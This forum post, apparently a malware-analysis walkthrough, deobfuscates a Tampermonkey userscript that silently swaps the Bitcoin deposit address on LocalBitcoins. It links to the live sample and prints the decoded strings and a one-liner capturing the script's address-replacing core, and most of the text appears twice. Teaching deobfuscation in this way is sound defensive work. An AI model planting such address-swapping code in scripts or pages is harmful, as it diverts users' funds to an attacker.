September 18th, 2019 at 2:03 PM
Someone on another forum recently sent me a code sample of a script he claimed to be malicious. The script was installed through TamperMonkey/GreaseMonkey and was allegedly used for stealing BTC from LocalBitcoins silently.
On top of that, the user also claimed that the script would still be active even after uninstalling/removing the script from TamperMonkey, which I already believed to be highly improbable.
Note, that's a live sample. Don't install it. I've made an edit to it, specifically the BTC address of the attacker, so in the case that you do install it and lose BTC, send me a message and I'll refund you the amount (minus fees ofc.)
Since it's a web browser script, it's written in Javascript.
Generally, the first thing you want to do when deobfuscating Javascript, you want to make it actually legible. Find the line endings, find where it should be indented, and so on.
For this, you can do it manually (find+replace ; with ;\n for line endings) and then add tabs as you see fit, but in VSCode you can simply install a pretty-printing addon and format through there, or use a cool tool called JSBeautify (now known as Beautifier.IO.) A quick google will return the page, I don't feel like linking anything that isn't a pastebin.
After that, you'll get something that looks like this:
Now, it's a user-script. User-scripts like this have meta-data. Have a look at the first nine lines. Specifically, have a look at lines 2, 5, 7.
2 gives the name of the script.
5 gives a description of what it's supposed to do (ie. misleading anyone who looks at the code.)
7 gives the rule for which sites this script works on.
Although the script claims to be only used for LocalBitcoins (LBTC) based on lines 2/5, line 7 tells us that the script is to be applied globally, ie. every web page that is visitted (and isn't blacklisted by TamperMonkey to be used on by the user.) That's the first red-flag.
Now, it's time to do some actual deobfuscation.
First, we want to start converting all LITERALS.
This means strings, integers, and anything that isn't being referenced as an offset or another variable or something.
Note lines 13 and 63.
Line 13 is a hex-encoded string. You can tell by the \x delimiter between values, and that each value is a single byte (ie. two hexadecimal characters, 0-F.)
Line 63 is essentially the same thing, except there's more than one.
After decoding line 13, you get a string that looks a lot like base64:
Plug it into a base64 decoder and you get:
Alright! We have our first piece of information!
Generally, I don't modify code unless it's something that will be implicitly converted by the interpreter, ie. the web Javascript engine. This isn't being implicitly converted. It's a string type inside an array, at offset 0 (notice the square brackets.) It needs to be converted first somewhere down the line. Instead, I usually just add a little comment at the end of the line/variable declaration with the actual decoded value.
Now, don't be doing this all in the post here. Open up your text editor and paste in the pretty-printed script. After commenting, you can do another cool thing. The variable names are all scrambled with arbitrary hex values (prefixed with _.) Copy the variable name, paste it into find+replace. Rename it (and all of its instances) to getElementsString (or something easily recognizable, you can rename things later as you need to.)
Let's take a look at the bottom, line 63 where we have more literals. Do the exact same thing with the hex-encoded strings and you'll find that they aren't even base64 encoded as well, just hex'd.
Please note that that's my BTC address, not some attacker. Don't try to report me to the FBI or something for financial crimeware. Like I said, if you send me money from there, I will simply refund it if you PM me.
You can use inline comments for these too, /* like this */
Okay, strings are done. You can already get a good idea what's going on in this script just by knowing these values. But if you're still confused, take it a step further.
So, we don't really have any more strings to fix (aside from the escaped sequence on line 29 if you want to edit that one too,) but we have two more things to do: integers/numbers and variable names.
You'll see most of the numbers in this code sample use hexadecimal notation again. Specifically, you'll notice an absolute ton of null bytes/0 values written as 0x0.
Find and replace again. Swap 0x0 with a simple 0. Watch out for the string-literal one on line 63 again.
Do this with every hexadecimal number you see. On line 37 in the loop you'll see 0x40, 0xff, 0x4, and more. Replace them as necessary, but be aware of what's going on. 0xff is being used as a mask with the bitwise & operator. Likely best to leave that one alone. But also keep in mind that 0xff & 0xzznn will always be equal to the last two bytes, ie. 0xnn. Maybe we can use that later.
Back to renaming. Specifically, variables.
We already renamed line 13. But what about others?
Line 34 presents us with something interesting: a character map. You guessed it: it's going to be used as offsets for converting integer values to ASCII characters. You can rename it to charsetMap or something.
But now this begs another question: why is the charset being brought up here? Like I mentioned, it's probably being used for conversion. I'll get back to it, because I need to explain another couple lesser-known features of Javascript:
Closures:
Closures are basically a fancy way of scoping functions around so that one object can have implicitly private/public variables, and allow functions to access data outside of their limited scope.
Take a look at the example at W3Schools for more info, this isn't a javascript tutorial.
Basically, this entire script is done using closures, also known as local functions. Literally. Read from line 10.
This is in part due to how tamper/greasemonkey work, but also for the sake of allowing this script to work even through obfuscation.
So when we're talking about introducing a charset here, it's because it's about to be used in another function.
(I hope you remembered to find+replace the name of the charset variable everywhere and not just the variable itself!)
Another cool feature of Javascript is called Array Notation. And no, I'm not talking about declaring/using arrays:
Array Notation (ON OBJECTS!)
Let's use an array as an example.
We can push new items into the array using the .push() method, right?
Printing the array will yield [1,2,3,4]
But you can also do some pretty f*** stuff with calling that method. By f***, I mean we can pass the method as a string to the object using the same notation that you used for declaring the array:
Google for 'object property accessor' or 'object bracket notation' to find a couple articles on why/how this is used.
What's relevant is that this is used almost EVERYWHERE in this code sample!
Even the push() and shift() array methods are being called using that notation on line 17.
And immediatelly, that tells us that the variable it's being used with (and the variables in the brackets) are all of array type! You can comment them or rename them as you choose.
But what's even more interesting is what goes on down by the charset we brought up earlier.
Right below it, in the loop, you can see a variable accessing something called 'atob'.
If you've done any JS development, you might have come across this method before: it converts the type string (base64 encoded) to a type string as plaintext.
So essentially, this entire function/loop is dedicated to converting the variable from line 13!
You can slowly drudge through the code more if you want, but at this point, it's safe to say we've figured out the sample's behaviour without needing to install it:
On line 63 with all the other strings we decoded earlier, it calls the document object's method, getElementsByClassName. Don't worry about the 0x0/0 that comes right after it (or within it.) It pulls in the classname of 'bitcoin-address bitcoin-address-controls' and once selected (if it can find anything,) calls the innerHTML property of the classname and replaces it with the value of the BTC address.
In other words, all that code simply does what a one-liner does:
Seems mostly harmless.
But where do we find the bitcoin-address* classnames on LBTC?
Right on the desposit page.
When you want to convert your hard-earned BTC to cash, bank transfer, paypal, or whatever, you need to deposit that BTC on their site using the address they give you on the deposit page.
When you open that page with the script, the script will silently change the address to the attacker, misleading you to send BTC to the attacker's BTC address.
So back to the original questions on behaviour:
--Is the script harmful?
--Will it survive uninstalls?
--Will it steal all your BTC?
1. Yes. We've established that through de-ob.
2. This script reflects no signs of that.
3. No, but it will try to mislead you into sending BTC to a different address than the one provided by LBTC, which can cause you to lose some money.
So what about question two?
After questioning the user more about what other addresses were allegedly changed to, he replied with a different address than that initially decoded from the sample.
It's likely he had other malware on his system installed and thought that removing this one script would make him clean.
His fault, I guess.
That concludes this little walkthrough. You can play around with the sample above. It's not my code and I don't assume any responsibility for damages done using the live sample, I'm only posting it here for the sake of informative purposes regarding deobfuscation.
I can post more walkthroughs regarding obfuscated code if you'd like. Most of it is regarding scripting languages, though, nothing native that's noteworthy, yet.
On top of that, the user also claimed that the script would still be active even after uninstalling/removing the script from TamperMonkey, which I already believed to be highly improbable.
Code:
https://pastebin.com/1FVJCFa8
Note, that's a live sample. Don't install it. I've made an edit to it, specifically the BTC address of the attacker, so in the case that you do install it and lose BTC, send me a message and I'll refund you the amount (minus fees ofc.)
Since it's a web browser script, it's written in Javascript.
Generally, the first thing you want to do when deobfuscating Javascript, you want to make it actually legible. Find the line endings, find where it should be indented, and so on.
For this, you can do it manually (find+replace ; with ;\n for line endings) and then add tabs as you see fit, but in VSCode you can simply install a pretty-printing addon and format through there, or use a cool tool called JSBeautify (now known as Beautifier.IO.) A quick google will return the page, I don't feel like linking anything that isn't a pastebin.
After that, you'll get something that looks like this:
Code:
https://pastebin.com/5k5KhMPs
Now, it's a user-script. User-scripts like this have meta-data. Have a look at the first nine lines. Specifically, have a look at lines 2, 5, 7.
2 gives the name of the script.
5 gives a description of what it's supposed to do (ie. misleading anyone who looks at the code.)
7 gives the rule for which sites this script works on.
Although the script claims to be only used for LocalBitcoins (LBTC) based on lines 2/5, line 7 tells us that the script is to be applied globally, ie. every web page that is visitted (and isn't blacklisted by TamperMonkey to be used on by the user.) That's the first red-flag.
Now, it's time to do some actual deobfuscation.
First, we want to start converting all LITERALS.
This means strings, integers, and anything that isn't being referenced as an offset or another variable or something.
Note lines 13 and 63.
Line 13 is a hex-encoded string. You can tell by the \x delimiter between values, and that each value is a single byte (ie. two hexadecimal characters, 0-F.)
Line 63 is essentially the same thing, except there's more than one.
After decoding line 13, you get a string that looks a lot like base64:
Code:
Z2V0RWxlbWVudHNCeUNsYXNzTmFtZQ==
Code:
getElementsByClassName
Alright! We have our first piece of information!
Generally, I don't modify code unless it's something that will be implicitly converted by the interpreter, ie. the web Javascript engine. This isn't being implicitly converted. It's a string type inside an array, at offset 0 (notice the square brackets.) It needs to be converted first somewhere down the line. Instead, I usually just add a little comment at the end of the line/variable declaration with the actual decoded value.
Code:
// getElementsByClassName
Now, don't be doing this all in the post here. Open up your text editor and paste in the pretty-printed script. After commenting, you can do another cool thing. The variable names are all scrambled with arbitrary hex values (prefixed with _.) Copy the variable name, paste it into find+replace. Rename it (and all of its instances) to getElementsString (or something easily recognizable, you can rename things later as you need to.)
Let's take a look at the bottom, line 63 where we have more literals. Do the exact same thing with the hex-encoded strings and you'll find that they aren't even base64 encoded as well, just hex'd.
Code:
'bitcoin-address bitcoin-address-controls',
'innerHTML',
'158MzR5HTL6c4insJts2XNnFdRMJwBgian'
You can use inline comments for these too, /* like this */
Okay, strings are done. You can already get a good idea what's going on in this script just by knowing these values. But if you're still confused, take it a step further.
So, we don't really have any more strings to fix (aside from the escaped sequence on line 29 if you want to edit that one too,) but we have two more things to do: integers/numbers and variable names.
You'll see most of the numbers in this code sample use hexadecimal notation again. Specifically, you'll notice an absolute ton of null bytes/0 values written as 0x0.
Find and replace again. Swap 0x0 with a simple 0. Watch out for the string-literal one on line 63 again.
Do this with every hexadecimal number you see. On line 37 in the loop you'll see 0x40, 0xff, 0x4, and more. Replace them as necessary, but be aware of what's going on. 0xff is being used as a mask with the bitwise & operator. Likely best to leave that one alone. But also keep in mind that 0xff & 0xzznn will always be equal to the last two bytes, ie. 0xnn. Maybe we can use that later.
Back to renaming. Specifically, variables.
We already renamed line 13. But what about others?
Line 34 presents us with something interesting: a character map. You guessed it: it's going to be used as offsets for converting integer values to ASCII characters. You can rename it to charsetMap or something.
But now this begs another question: why is the charset being brought up here? Like I mentioned, it's probably being used for conversion. I'll get back to it, because I need to explain another couple lesser-known features of Javascript:
Closures:
Closures are basically a fancy way of scoping functions around so that one object can have implicitly private/public variables, and allow functions to access data outside of their limited scope.
Take a look at the example at W3Schools for more info, this isn't a javascript tutorial.
Basically, this entire script is done using closures, also known as local functions. Literally. Read from line 10.
This is in part due to how tamper/greasemonkey work, but also for the sake of allowing this script to work even through obfuscation.
So when we're talking about introducing a charset here, it's because it's about to be used in another function.
(I hope you remembered to find+replace the name of the charset variable everywhere and not just the variable itself!)
Another cool feature of Javascript is called Array Notation. And no, I'm not talking about declaring/using arrays:
Array Notation (ON OBJECTS!)
Let's use an array as an example.
Code:
var myArray[1,2,3]
We can push new items into the array using the .push() method, right?
Code:
myArray.push(4)
Printing the array will yield [1,2,3,4]
But you can also do some pretty f*** stuff with calling that method. By f***, I mean we can pass the method as a string to the object using the same notation that you used for declaring the array:
Code:
myArray['push'](4)
Google for 'object property accessor' or 'object bracket notation' to find a couple articles on why/how this is used.
What's relevant is that this is used almost EVERYWHERE in this code sample!
Even the push() and shift() array methods are being called using that notation on line 17.
And immediatelly, that tells us that the variable it's being used with (and the variables in the brackets) are all of array type! You can comment them or rename them as you choose.
But what's even more interesting is what goes on down by the charset we brought up earlier.
Right below it, in the loop, you can see a variable accessing something called 'atob'.
If you've done any JS development, you might have come across this method before: it converts the type string (base64 encoded) to a type string as plaintext.
So essentially, this entire function/loop is dedicated to converting the variable from line 13!
You can slowly drudge through the code more if you want, but at this point, it's safe to say we've figured out the sample's behaviour without needing to install it:
On line 63 with all the other strings we decoded earlier, it calls the document object's method, getElementsByClassName. Don't worry about the 0x0/0 that comes right after it (or within it.) It pulls in the classname of 'bitcoin-address bitcoin-address-controls' and once selected (if it can find anything,) calls the innerHTML property of the classname and replaces it with the value of the BTC address.
In other words, all that code simply does what a one-liner does:
Code:
document.getElementsByClassName('bitcoin-address bitcoin-address-controls').innerHTML = "BTC-ADDRESS"
Seems mostly harmless.
But where do we find the bitcoin-address* classnames on LBTC?
Right on the desposit page.
When you want to convert your hard-earned BTC to cash, bank transfer, paypal, or whatever, you need to deposit that BTC on their site using the address they give you on the deposit page.
When you open that page with the script, the script will silently change the address to the attacker, misleading you to send BTC to the attacker's BTC address.
So back to the original questions on behaviour:
--Is the script harmful?
--Will it survive uninstalls?
--Will it steal all your BTC?
1. Yes. We've established that through de-ob.
2. This script reflects no signs of that.
3. No, but it will try to mislead you into sending BTC to a different address than the one provided by LBTC, which can cause you to lose some money.
So what about question two?
After questioning the user more about what other addresses were allegedly changed to, he replied with a different address than that initially decoded from the sample.
It's likely he had other malware on his system installed and thought that removing this one script would make him clean.
His fault, I guess.
That concludes this little walkthrough. You can play around with the sample above. It's not my code and I don't assume any responsibility for damages done using the live sample, I'm only posting it here for the sake of informative purposes regarding deobfuscation.
I can post more walkthroughs regarding obfuscated code if you'd like. Most of it is regarding scripting languages, though, nothing native that's noteworthy, yet.